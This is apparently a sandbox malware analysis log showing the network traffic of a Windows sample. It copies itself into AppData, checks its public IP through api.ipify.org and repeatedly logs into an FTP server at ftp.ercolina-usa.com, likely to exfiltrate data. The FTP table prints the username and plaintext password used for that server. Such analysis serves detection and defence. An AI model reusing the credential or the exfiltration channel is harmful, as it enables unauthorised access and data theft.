Jan 11, 2025 04:21:02.072813034 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.072909117 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:02.076142073 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:02.076154947 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.076450109 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.123625040 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:02.159624100 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:02.203373909 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.273188114 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.273256063 CET	443	49732	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:02.273576975 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:02.279181004 CET	49732	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:03.334166050 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:03.340375900 CET	21	49734	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:03.342061996 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:03.375030041 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:03.380281925 CET	21	49734	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:03.382069111 CET	49734	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:03.525557995 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:03.530498028 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:03.530874014 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.064600945 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.064807892 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.069725037 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.211875916 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.212030888 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.217044115 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.464126110 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.464263916 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.469178915 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.610708952 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.610861063 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.615803957 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.756031990 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.756161928 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.761132002 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.903832912 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:04.904047012 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:04.909003019 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.049140930 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.050005913 CET	49738	38934	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.055422068 CET	38934	49738	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.055502892 CET	49738	38934	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.055555105 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.060642958 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.532484055 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.532713890 CET	49738	38934	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.532879114 CET	49738	38934	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.537781000 CET	38934	49738	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.537813902 CET	38934	49738	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.537842035 CET	38934	49738	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.538053989 CET	38934	49738	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.538108110 CET	49738	38934	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.612699032 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.678498030 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.678908110 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.683824062 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.825026989 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.825445890 CET	49739	49382	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.830367088 CET	49382	49739	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:05.831938028 CET	49739	49382	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.833170891 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:05.838068008 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:06.298521042 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:06.298715115 CET	49739	49382	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:06.303879023 CET	49382	49739	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:06.303932905 CET	49739	49382	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:06.444796085 CET	21	49735	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:06.444871902 CET	49735	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:13.075859070 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.075903893 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.075973034 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.082731962 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.082740068 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.543600082 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.543704987 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.545080900 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.545100927 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.545496941 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.594543934 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.605335951 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.647334099 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.718198061 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.718283892 CET	443	49740	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:13.718358994 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:13.720978022 CET	49740	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:14.539722919 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:14.544851065 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:14.544936895 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.081118107 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.081290007 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.086209059 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.227514029 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.227643013 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.232517004 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.485028028 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.485250950 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.490227938 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.631519079 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.632368088 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.637247086 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.778208971 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.778373003 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.783211946 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.924542904 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:15.925431967 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:15.930246115 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.071548939 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.072828054 CET	49744	42249	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.077680111 CET	42249	49744	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.077831030 CET	49744	42249	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.078440905 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.083369970 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.551496029 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.551812887 CET	49744	42249	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.551882982 CET	49744	42249	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.556746960 CET	42249	49744	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.556951046 CET	42249	49744	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.559832096 CET	49744	42249	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.592427015 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.699701071 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.721009970 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.725908995 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.867297888 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.867693901 CET	49746	49326	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.872601032 CET	49326	49746	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:16.872669935 CET	49746	49326	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.872740984 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:16.877484083 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.344033957 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.344335079 CET	49746	49326	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.344335079 CET	49746	49326	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.349200010 CET	49326	49746	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.349217892 CET	49326	49746	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.349231958 CET	49326	49746	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.349519014 CET	49326	49746	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.349574089 CET	49746	49326	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.389292002 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.491111040 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.491470098 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.496258020 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.637845039 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.638222933 CET	49748	36065	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.643155098 CET	36065	49748	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:17.643228054 CET	49748	36065	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.643291950 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:17.648112059 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:18.114681959 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:18.114892960 CET	49748	36065	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:18.119940042 CET	36065	49748	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:18.119997025 CET	49748	36065	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:18.170531988 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:18.262296915 CET	21	49741	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:18.311184883 CET	49741	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:21.269134045 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.269187927 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.269265890 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.272104025 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.272119045 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.726936102 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.727020025 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.729027033 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.729042053 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.729242086 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.776735067 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.819329023 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.888638020 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.888719082 CET	443	49751	104.26.12.205	192.168.2.4
Jan 11, 2025 04:21:21.888781071 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:21.891444921 CET	49751	443	192.168.2.4	104.26.12.205
Jan 11, 2025 04:21:22.316199064 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:22.321165085 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:22.321232080 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:22.861179113 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:22.861378908 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:22.866276979 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.009325027 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.009464979 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.014549017 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.256390095 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.256511927 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.261555910 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.402278900 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.402451992 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.407428026 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.548365116 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.548624992 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.554259062 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.695213079 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.695348978 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.700189114 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.845820904 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.846385956 CET	49753	47402	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.851361036 CET	47402	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:23.851672888 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.851764917 CET	49753	47402	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:23.856672049 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.331221104 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.331495047 CET	49753	47402	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.331496000 CET	49753	47402	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.336352110 CET	47402	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.336585045 CET	47402	49753	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.336766958 CET	49753	47402	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.373681068 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.477792025 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.500842094 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.506234884 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.647654057 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.648118973 CET	49754	47859	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.653053999 CET	47859	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:24.653137922 CET	49754	47859	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.653223991 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:24.658118963 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.132091999 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.132297039 CET	49754	47859	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.132334948 CET	49754	47859	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.137208939 CET	47859	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.137219906 CET	47859	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.137228966 CET	47859	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.137505054 CET	47859	49754	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.137546062 CET	49754	47859	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.186222076 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.278572083 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.278881073 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.283890963 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.424976110 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.425452948 CET	49755	38674	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.430371046 CET	38674	49755	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.430489063 CET	49755	38674	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.430588961 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.435503960 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.891190052 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.894134998 CET	49755	38674	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.899239063 CET	38674	49755	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:25.899306059 CET	49755	38674	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:25.936206102 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:21:26.040491104 CET	21	49752	192.254.225.136	192.168.2.4
Jan 11, 2025 04:21:26.092502117 CET	49752	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:07.382989883 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:07.387878895 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:07.388004065 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:07.949067116 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:07.952410936 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:07.957189083 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.102293015 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.104441881 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:08.109316111 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.357089043 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.357443094 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:08.362287045 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.507328987 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.507504940 CET	50022	21	192.168.2.4	192.254.225.136
Jan 11, 2025 04:23:08.512336016 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.657403946 CET	21	50022	192.254.225.136	192.168.2.4
Jan 11, 2025 04:23:08.702131987 CET	50022	21	192.168.2.4	192.254.225.136

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:21:01.559900045 CET	52000	53	192.168.2.4	1.1.1.1
Jan 11, 2025 04:21:01.566987991 CET	53	52000	1.1.1.1	192.168.2.4
Jan 11, 2025 04:21:02.888674974 CET	57055	53	192.168.2.4	1.1.1.1
Jan 11, 2025 04:21:03.323548079 CET	53	57055	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:21:01.559900045 CET	192.168.2.4	1.1.1.1	0xb961	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:21:02.888674974 CET	192.168.2.4	1.1.1.1	0xd638	Standard query (0)	ftp.ercolina-usa.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:21:01.566987991 CET	1.1.1.1	192.168.2.4	0xb961	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:21:01.566987991 CET	1.1.1.1	192.168.2.4	0xb961	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:21:01.566987991 CET	1.1.1.1	192.168.2.4	0xb961	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:21:03.323548079 CET	1.1.1.1	192.168.2.4	0xd638	No error (0)	ftp.ercolina-usa.com	ercolina-usa.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:21:03.323548079 CET	1.1.1.1	192.168.2.4	0xd638	No error (0)	ercolina-usa.com		192.254.225.136	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	104.26.12.205	443	7568	C:\Users\user\Desktop\iNFGd6bDZX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:21:02 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 03:21:02 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:21:02 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9001c63cca8743f3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1763&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1656267&cwnd=213&unsent_bytes=0&cid=f07c23faa9b919af&ts=210&x=0"
2025-01-11 03:21:02 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	104.26.12.205	443	8056	C:\Users\user\AppData\Roaming\newapp\newapp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:21:13 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 03:21:13 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:21:13 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9001c6845fa641c1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1574&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1800246&cwnd=205&unsent_bytes=0&cid=5aec6d029123109d&ts=181&x=0"
2025-01-11 03:21:13 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49751	104.26.12.205	443	4192	C:\Users\user\AppData\Roaming\newapp\newapp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:21:21 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 03:21:21 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:21:21 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9001c6b76efa8c7b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2013&rtt_var=775&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1393129&cwnd=186&unsent_bytes=0&cid=660cdec4dac77fd0&ts=166&x=0"
2025-01-11 03:21:21 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 04:21:04.064600945 CET	21	49735	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 04:21:04.064807892 CET	49735	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 04:21:04.211875916 CET	21	49735	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 04:21:04.212030888 CET	49735	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 04:21:04.464126110 CET	21	49735	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 04:21:04.610708952 CET	21	49735	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 04:21:04.610861063 CET	49735	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 04:21:04.756031990 CET	21	49735	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 04:21:04.756161928 CET	49735	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 04:21:04.903832912 CET	21	49735	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 04:21:04.904047012 CET	49735	21	192.168.2.4	192.254.225.136	PASV
